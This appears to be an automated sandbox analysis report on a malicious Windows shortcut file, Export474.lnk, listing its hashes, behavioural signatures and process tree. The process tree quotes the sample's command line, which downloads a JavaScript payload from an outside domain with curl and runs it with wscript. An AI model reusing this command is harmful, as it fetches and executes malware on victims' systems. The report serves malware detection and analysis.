Analysis
max time kernel: 41s
max time network: 45s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 08-09-2022 18:56
Static task: static1
Behavioral task: behavioral1
Sample: Export474.lnk
Resource: win7-20220812-en (windows7-x64), 2 signatures, 150 seconds
General
Target: Export474.lnk
Size: 2KB
MD5: e3bd2b8ab3b2aa72f21d6b1aea8dd4e0
SHA1: 279b748f40cc8377d63b630c756c60644e9be89e
SHA256: 77fe3b85503872e252ee98f49c1491d7dfc7cb3579ff3771bd7ad59f68c0dc60
SHA512: 6aea0405c1eb507611c9ee21ac0ba0b8c2a719653ee1b644e015608ee5d3dae6a706f9b328b26ff3961cd7b690a9dfe1e6f6e30405d78c11efa08711f59b55cb
Score: 3/10
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
  description                     | pid  | process | target process
  PID 1416 wrote to memory of 968 | 1416 | cmd.exe | cmd.exe
  PID 1416 wrote to memory of 968 | 1416 | cmd.exe | cmd.exe
  PID 1416 wrote to memory of 968 | 1416 | cmd.exe | cmd.exe
Processes
- [1] C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Export474.lnk
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\cmd.exe (child of [1])
    Command line: "C:\Windows\System32\cmd.exe" /q /c echo 'HI_U' && MD "C:\Users\Admin\AppData\Local\ur\B4O" && curl.exe --output C:\Users\Admin\AppData\Local\ur\B4O\enhrP.s_1L.QH0w.js https://purepowerinc.net/nluGZ/082.html && cd "C:\Users\Admin\AppData\Local\ur\B4O" && wscript enhrP.s_1L.QH0w.js && echo "Nj"